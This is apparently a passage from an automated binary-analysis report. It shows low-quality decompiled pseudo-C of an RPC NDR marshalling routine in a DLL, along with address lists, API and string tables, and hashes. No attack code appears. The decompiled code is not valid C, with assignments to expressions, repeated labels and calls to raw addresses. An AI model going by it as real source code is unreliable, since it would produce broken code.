                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 2:
                                                                                                									L9:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *( *(__ebp + 0xc));
                                                                                                									_push( *( *(__ebp + 0xc)));
                                                                                                									_push("long=%d <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 8) = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 3:
                                                                                                									L10:
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									asm("cvtss2sd xmm0, [edx]");
                                                                                                									__esp = __esp - 8;
                                                                                                									asm("movsd [esp], xmm0");
                                                                                                									_push("float=%f <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0x10;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 4:
                                                                                                									L11:
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *(__ecx + 4);
                                                                                                									_push( *(__ecx + 4));
                                                                                                									__eax =  *__ecx;
                                                                                                									_push(__eax);
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 8;
                                                                                                									_push(__eax);
                                                                                                									_push("longlong=%s <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *(__ebp + 8);
                                                                                                									E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 8) =  *(__ebp + 0xc);
                                                                                                									__eax =  *(__ebp + 0xc) + 8;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 5:
                                                                                                									L12:
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__esp = __esp - 8;
                                                                                                									asm("movsd xmm0, [edx]");
                                                                                                									asm("movsd [esp], xmm0");
                                                                                                									_push("double=%f <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0x10;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 8);
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 6:
                                                                                                									L6:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp - 4) =  *( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax =  *( *(__ebp + 0xc));
                                                                                                									_push( *( *(__ebp + 0xc)));
                                                                                                									_push("enum16=%d <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									if( *( *(__ebp + 0xc)) > 0x7fff) {
                                                                                                										_push(0x6f5);
                                                                                                										__imp__RpcRaiseException();
                                                                                                									}
                                                                                                									L8:
                                                                                                									__edx = __ebp - 4;
                                                                                                									 *(__ebp + 8) = E6EDAB030( *(__ebp + 8), __ebp - 4, 2);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 7:
                                                                                                									L13:
                                                                                                									 *(__ebp - 0x18) = 0;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *( *(__ebp + 0xc));
                                                                                                									_push( *( *(__ebp + 0xc)));
                                                                                                									_push("pointer=%p <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__eax =  *(__ebp + 8);
                                                                                                									__ecx =  *(__eax + 4);
                                                                                                									_push( *(__eax + 4));
                                                                                                									_push("pStubMsg->Buffer before %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 8;
                                                                                                									__edx =  *(__ebp + 0x10);
                                                                                                									__eax =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                									if(( *( *(__ebp + 0x10)) & 0x000000ff) != 0x36) {
                                                                                                										__ecx =  *(__ebp + 0x10);
                                                                                                										 *(__ebp + 0x14) =  *(__ebp + 0x10);
                                                                                                									}
                                                                                                									__edx =  *(__ebp + 0x14);
                                                                                                									__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                									if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                                										__ecx =  *(__ebp + 8);
                                                                                                										__eax = E6EDA7400( *(__ebp + 8) + 4,  *(__ebp + 8) + 4, 4);
                                                                                                									}
                                                                                                									__edx =  *(__ebp + 8);
                                                                                                									__eax =  *(__edx + 4);
                                                                                                									 *(__ebp - 0x1c) =  *(__edx + 4);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									if( *( *(__ebp + 8) + 0x34) == 0) {
                                                                                                										__eax =  *(__ebp + 0x14);
                                                                                                										__ecx =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__eax = E6EDAAF00( *(__ebp + 8), 4);
                                                                                                										}
                                                                                                									} else {
                                                                                                										__edx =  *(__ebp + 8);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__eax + 0x34);
                                                                                                										 *( *(__ebp + 8) + 4) =  *(__eax + 0x34);
                                                                                                										__edx =  *(__ebp + 8);
                                                                                                										 *( *(__ebp + 8) + 0x34) = 0;
                                                                                                										 *(__ebp - 0x18) = 1;
                                                                                                									}
                                                                                                									__eax =  *(__ebp + 0x14);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp - 0x1c);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAB220( *(__ebp + 8),  *(__ebp - 0x1c),  *( *(__ebp + 0xc)),  *(__ebp + 0x14));
                                                                                                									if( *(__ebp - 0x18) == 0) {
                                                                                                										L27:
                                                                                                										__edx =  *(__ebp + 8);
                                                                                                										__eax =  *(__edx + 4);
                                                                                                										_push( *(__edx + 4));
                                                                                                										_push("pStubMsg->Buffer after %p\n");
                                                                                                										0x6eda0000();
                                                                                                										__esp = __esp + 8;
                                                                                                										__ecx =  *(__ebp + 0x10);
                                                                                                										__edx =  *__ecx & 0x000000ff;
                                                                                                										if(( *__ecx & 0x000000ff) != 0x36) {
                                                                                                											__ecx =  *(__ebp + 0x10);
                                                                                                											__ecx =  *(__ebp + 0x10) + 4;
                                                                                                											 *(__ebp + 0x10) = __ecx;
                                                                                                										} else {
                                                                                                											 *(__ebp + 0x14) =  *(__ebp + 0x14) + 4;
                                                                                                											 *(__ebp + 0x14) =  *(__ebp + 0x14) + 4;
                                                                                                										}
                                                                                                										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                										while(1) {
                                                                                                											L44:
                                                                                                											 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                											goto L1;
                                                                                                										}
                                                                                                									} else {
                                                                                                										do {
                                                                                                											L22:
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__eax =  *(__edx + 0x14);
                                                                                                											_push( *(__edx + 0x14));
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											__edx =  *( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp + 8);
                                                                                                											 *(__eax + 4) =  *(__eax + 4) -  *(__edx + 8);
                                                                                                											_push( *(__eax + 4) -  *(__edx + 8));
                                                                                                											_push("buffer=%d/%d\n");
                                                                                                											0x6eda0000();
                                                                                                											__esp = __esp + 0xc;
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__eax =  *( *(__ebp + 8));
                                                                                                											__ecx =  *(__eax + 8);
                                                                                                											__edx =  *(__ebp + 8);
                                                                                                											__ecx =  *(__eax + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                                											__eax =  *(__ebp + 8);
                                                                                                											if( *( *(__ebp + 8) + 4) > __ecx) {
                                                                                                												__ecx =  *(__ebp + 8);
                                                                                                												__edx =  *( *(__ebp + 8));
                                                                                                												__eax =  *(__edx + 8);
                                                                                                												__ecx =  *(__ebp + 8);
                                                                                                												__eax =  *(__edx + 8) +  *((intOrPtr*)( *(__ebp + 8) + 0x14));
                                                                                                												__edx =  *(__ebp + 8);
                                                                                                												__ecx =  *(__edx + 4);
                                                                                                												__ecx =  *(__edx + 4) - __eax;
                                                                                                												_push( *(__edx + 4) - __eax);
                                                                                                												_push("buffer overflow %d bytes\n");
                                                                                                												0x6eda0000();
                                                                                                												__esp = __esp + 8;
                                                                                                											}
                                                                                                											__edx = 0;
                                                                                                										} while (0 != 0);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp + 8);
                                                                                                										__edx =  *(__ecx + 4);
                                                                                                										 *( *(__ebp + 8) + 0x34) =  *(__ecx + 4);
                                                                                                										__eax =  *(__ebp + 8);
                                                                                                										__ecx =  *(__ebp - 0x1c);
                                                                                                										 *( *(__ebp + 8) + 4) =  *(__ebp - 0x1c);
                                                                                                										__edx =  *(__ebp + 0x14);
                                                                                                										__eax =  *( *(__ebp + 0x14)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp + 0x14)) & 0x000000ff) != 0x11) {
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											__eax = E6EDAAF00( *(__ebp + 8), 4);
                                                                                                										}
                                                                                                										goto L27;
                                                                                                									}
                                                                                                								case 8:
                                                                                                									L31:
                                                                                                									__eax =  *(__ebp - 0x10);
                                                                                                									__ecx = __ebp + 0xc;
                                                                                                									__eax = E6EDA7450(__ecx, __ecx,  *(__ebp - 0x10), 2);
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 9:
                                                                                                									L32:
                                                                                                									__edx =  *(__ebp - 0x10);
                                                                                                									__ebp + 0xc = E6EDA7450(__ecx, __ebp + 0xc,  *(__ebp - 0x10), 4);
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xa:
                                                                                                									L33:
                                                                                                									__ecx =  *(__ebp - 0x10);
                                                                                                									__edx = __ebp + 0xc;
                                                                                                									__eax = E6EDA7450(__ecx, __ebp + 0xc, __ecx, 8);
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xb:
                                                                                                									L34:
                                                                                                									__eax =  *(__ebp + 0x10);
                                                                                                									__ecx =  *( *(__ebp + 0x10)) & 0x000000ff;
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									__eax = __edx + __ecx - 0x3c;
                                                                                                									 *(__ebp + 0xc) = __edx + __ecx - 0x3c;
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xc:
                                                                                                									L35:
                                                                                                									1 = 1 << 0;
                                                                                                									__edx =  *(__ebp + 0x10);
                                                                                                									 *(__edx + (1 << 0)) & 0x000000ff = ( *(__edx + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 0xc) = ( *(__edx + (1 << 0)) & 0x000000ff) +  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									__edx =  *(__ebp + 0x10);
                                                                                                									 *( *(__ebp + 0x10)) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
                                                                                                									 *(__ebp - 8) =  *( *(__ebp + 0x10)) +  *(__ebp + 0x10);
                                                                                                									__ecx =  *(__ebp - 8);
                                                                                                									__edx =  *(__ebp + 8);
                                                                                                									 *(__ebp - 0x20) = E6EDAE3A0( *(__ebp + 8),  *(__ebp - 8));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp - 0x20);
                                                                                                									_push( *(__ebp - 0x20));
                                                                                                									_push("embedded complex (size=%d) <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__edx =  *(__ebp - 8);
                                                                                                									__eax =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                									__eax =  *( *(__ebp - 8)) & 0x7f;
                                                                                                									__ecx =  *(0x6edbb218 + __eax * 4);
                                                                                                									 *(__ebp - 0x14) =  *(0x6edbb218 + __eax * 4);
                                                                                                									if( *(__ebp - 0x14) == 0) {
                                                                                                										__edx =  *(__ebp - 8);
                                                                                                										__eax =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                										_push( *( *(__ebp - 8)) & 0x000000ff);
                                                                                                										_push("no marshaller for embedded type %02x\n");
                                                                                                										0x6eda0000();
                                                                                                										__esp = __esp + 8;
                                                                                                									} else {
                                                                                                										__edx =  *(__ebp - 8);
                                                                                                										__eax =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                										if(( *( *(__ebp - 8)) & 0x000000ff) != 0x2f) {
                                                                                                											__edx =  *(__ebp - 8);
                                                                                                											_push( *(__ebp - 8));
                                                                                                											__eax =  *(__ebp + 0xc);
                                                                                                											_push( *(__ebp + 0xc));
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											_push( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp - 0x14)();
                                                                                                										} else {
                                                                                                											__ecx =  *(__ebp - 8);
                                                                                                											_push( *(__ebp - 8));
                                                                                                											__edx =  *(__ebp + 0xc);
                                                                                                											__eax =  *( *(__ebp + 0xc));
                                                                                                											_push( *( *(__ebp + 0xc)));
                                                                                                											__ecx =  *(__ebp + 8);
                                                                                                											_push( *(__ebp + 8));
                                                                                                											__eax =  *(__ebp - 0x14)();
                                                                                                										}
                                                                                                									}
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) +  *(__ebp - 0x20);
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									 *(__ebp + 0x10) =  *(__ebp + 0x10) + 2;
                                                                                                									goto L1;
                                                                                                								case 0xd:
                                                                                                									L42:
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xe:
                                                                                                									goto L0;
                                                                                                								case 0xf:
                                                                                                									goto L43;
                                                                                                							}
                                                                                                						}
                                                                                                						return  *(_t210 + 0xc);
                                                                                                					}
                                                                                                				}
                                                                                                			}






                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x6eda9249
                                                                                                0x6eda9249
                                                                                                0x6eda9249
                                                                                                0x6eda9249
                                                                                                0x6eda924c
                                                                                                0x6eda924f
                                                                                                0x6eda9250
                                                                                                0x6eda9253
                                                                                                0x6eda9255
                                                                                                0x6eda925b
                                                                                                0x6eda925e
                                                                                                0x6eda925f
                                                                                                0x6eda9264
                                                                                                0x6eda9269
                                                                                                0x6eda926c
                                                                                                0x6eda926f
                                                                                                0x6eda9271
                                                                                                0x6eda9274
                                                                                                0x6eda9277
                                                                                                0x6eda927a
                                                                                                0x6eda9280
                                                                                                0x6eda9282
                                                                                                0x6eda9285
                                                                                                0x6eda9287
                                                                                                0x6eda928a
                                                                                                0x6eda928d
                                                                                                0x6eda9290
                                                                                                0x6eda9293
                                                                                                0x6eda9296
                                                                                                0x6eda9298
                                                                                                0x6eda9299
                                                                                                0x6eda929e
                                                                                                0x6eda92a3
                                                                                                0x6eda92a3
                                                                                                0x6eda92a6
                                                                                                0x6eda92a6
                                                                                                0x6eda92aa
                                                                                                0x6eda92ad
                                                                                                0x6eda92b0
                                                                                                0x6eda92b3
                                                                                                0x6eda92b6
                                                                                                0x6eda92b9
                                                                                                0x6eda92bc
                                                                                                0x6eda92bf
                                                                                                0x6eda92c2
                                                                                                0x6eda92c8
                                                                                                0x6eda92cc
                                                                                                0x6eda92d0
                                                                                                0x6eda92d5
                                                                                                0x00000000
                                                                                                0x6eda92c8
                                                                                                0x00000000
                                                                                                0x6eda9319
                                                                                                0x6eda931b
                                                                                                0x6eda931f
                                                                                                0x6eda9323
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda9330
                                                                                                0x6eda9332
                                                                                                0x6eda933a
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda9347
                                                                                                0x6eda9349
                                                                                                0x6eda934d
                                                                                                0x6eda9351
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda935e
                                                                                                0x6eda935e
                                                                                                0x6eda9361
                                                                                                0x6eda9364
                                                                                                0x6eda9367
                                                                                                0x6eda936b
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x6eda9373
                                                                                                0x6eda9378
                                                                                                0x6eda937b
                                                                                                0x6eda9382
                                                                                                0x6eda9385
                                                                                                0x6eda938b
                                                                                                0x6eda938e
                                                                                                0x6eda9391
                                                                                                0x6eda9397
                                                                                                0x6eda939a
                                                                                                0x6eda939d
                                                                                                0x6eda93a1
                                                                                                0x6eda93ad
                                                                                                0x6eda93b0
                                                                                                0x6eda93b3
                                                                                                0x6eda93b4
                                                                                                0x6eda93b7
                                                                                                0x6eda93b8
                                                                                                0x6eda93bd
                                                                                                0x6eda93c2
                                                                                                0x6eda93c5
                                                                                                0x6eda93c8
                                                                                                0x6eda93cb
                                                                                                0x6eda93ce
                                                                                                0x6eda93d5
                                                                                                0x6eda93dc
                                                                                                0x6eda940d
                                                                                                0x6eda9410
                                                                                                0x6eda9413
                                                                                                0x6eda9414
                                                                                                0x6eda9419
                                                                                                0x6eda941e
                                                                                                0x6eda93de
                                                                                                0x6eda93de
                                                                                                0x6eda93e1
                                                                                                0x6eda93e7
                                                                                                0x6eda93fc
                                                                                                0x6eda93ff
                                                                                                0x6eda9400
                                                                                                0x6eda9403
                                                                                                0x6eda9404
                                                                                                0x6eda9407
                                                                                                0x6eda9408
                                                                                                0x6eda93e9
                                                                                                0x6eda93e9
                                                                                                0x6eda93ec
                                                                                                0x6eda93ed
                                                                                                0x6eda93f0
                                                                                                0x6eda93f2
                                                                                                0x6eda93f3
                                                                                                0x6eda93f6
                                                                                                0x6eda93f7
                                                                                                0x6eda93f7
                                                                                                0x6eda940b
                                                                                                0x6eda9421
                                                                                                0x6eda9424
                                                                                                0x6eda9427
                                                                                                0x6eda942d
                                                                                                0x6eda9430
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda9438
                                                                                                0x6eda944e
                                                                                                0x6eda944e
                                                                                                0x6eda9454
                                                                                                0x00000000
                                                                                                0x6eda9457
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda8f74
                                                                                                0x6eda9462
                                                                                                0x6eda9462
                                                                                                0x6eda944e

                                                                                                APIs
                                                                                                  • Part of subcall function 6EDAB030: RpcRaiseException.RPCRT4(000006F7,?,?,?,00000001), ref: 6EDAB08B
                                                                                                  • Part of subcall function 6EDAB030: _memmove.LIBCMT ref: 6EDAB0A0
                                                                                                • RpcRaiseException.RPCRT4(000006F5), ref: 6EDA901C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise$_memmove
                                                                                                • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d <= %p$double=%f <= %p$enum16=%d <= %p$float=%f <= %p$int3264=%ld <= %p$long=%d <= %p$longlong=%s <= %p$pStubMsg->Buffer after %p$pStubMsg->Buffer before %p$pointer=%p <= %p$short=%d <= %p
                                                                                                • API String ID: 2890701851-3536666572
                                                                                                • Opcode ID: 239349f4892442445dfba5ecd6a6906a25b7bd98e53daeeb2bcef6b0e82aefa3
                                                                                                • Instruction ID: b4e3b874f892ed4df266ad89c01bd8a19c0ddd2b94ec122731a9e0f0fa6892af
                                                                                                • Opcode Fuzzy Hash: 239349f4892442445dfba5ecd6a6906a25b7bd98e53daeeb2bcef6b0e82aefa3
                                                                                                • Instruction Fuzzy Hash: 2AD14DB9A00108AFCB04CF98D890EAA7B76EF89354F14C518FA194F345E731EB51CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 16%
                                                                                                			E6EDA935E() {
                                                                                                				void* _t204;
                                                                                                				void* _t206;
                                                                                                
                                                                                                				L0:
                                                                                                				while(1) {
                                                                                                					L0:
                                                                                                					 *(_t204 + 0xc) =  *(_t204 + 0xc) + ( *( *(_t204 + 0x10)) & 0x000000ff) - 0x3c;
                                                                                                					while(1) {
                                                                                                						L44:
                                                                                                						 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
                                                                                                						L1:
                                                                                                						while(( *( *(_t204 + 0x10)) & 0x000000ff) != 0x5b) {
                                                                                                							 *(_t204 - 0xc) =  *( *(_t204 + 0x10)) & 0x000000ff;
                                                                                                							 *(_t204 - 0xc) =  *(_t204 - 0xc) - 1;
                                                                                                							if( *(_t204 - 0xc) > 0xb8) {
                                                                                                								L43:
                                                                                                								0x6eda0000("unhandled format 0x%02x\n",  *( *(_t204 + 0x10)) & 0x000000ff);
                                                                                                								_t206 = _t206 + 8;
                                                                                                								while(1) {
                                                                                                									L44:
                                                                                                									 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
                                                                                                									goto L1;
                                                                                                								}
                                                                                                							}
                                                                                                							L3:
                                                                                                							_t13 =  *(_t204 - 0xc) + 0x6eda94a4; // 0xcccccc0e
                                                                                                							switch( *((intOrPtr*)(( *_t13 & 0x000000ff) * 4 +  &M6EDA9464))) {
                                                                                                								case 0:
                                                                                                									L4:
                                                                                                									_push( *(_t204 + 0xc));
                                                                                                									_push( *( *(_t204 + 0xc)) & 0x0000ffff);
                                                                                                									_push("byte=%d <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									E6EDAB030( *((intOrPtr*)(_t204 + 8)),  *(_t204 + 0xc), 1);
                                                                                                									_t206 = _t206 + 0x18;
                                                                                                									 *(_t204 + 0xc) =  &(( *(_t204 + 0xc))[0]);
                                                                                                									L44:
                                                                                                									 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
                                                                                                									goto L1;
                                                                                                								case 1:
                                                                                                									L5:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                                                                                                									_push( *( *(__ebp + 0xc)) & 0x0000ffff);
                                                                                                									_push("short=%d <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 8) = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 2);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 2;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 2:
                                                                                                									L9:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *( *(__ebp + 0xc));
                                                                                                									_push( *( *(__ebp + 0xc)));
                                                                                                									_push("long=%d <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 8) = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 3:
                                                                                                									L11:
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									asm("cvtss2sd xmm0, [edx]");
                                                                                                									__esp = __esp - 8;
                                                                                                									asm("movsd [esp], xmm0");
                                                                                                									_push("float=%f <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0x10;
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 8);
                                                                                                									__eax = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 4);
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									while(1) {
                                                                                                										L44:
                                                                                                										 *(_t204 + 0x10) =  &(( *(_t204 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 4:
                                                                                                									L12:
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__edx =  *(__ecx + 4);
                                                                                                									_push( *(__ecx + 4));
                                                                                                									__eax =  *__ecx;
                                                                                                									_push(__eax);
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 8;
                                                                                                									_push(__eax);
                                                                                                									_push("longlong=%s <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__ecx =  *(__ebp + 0xc);
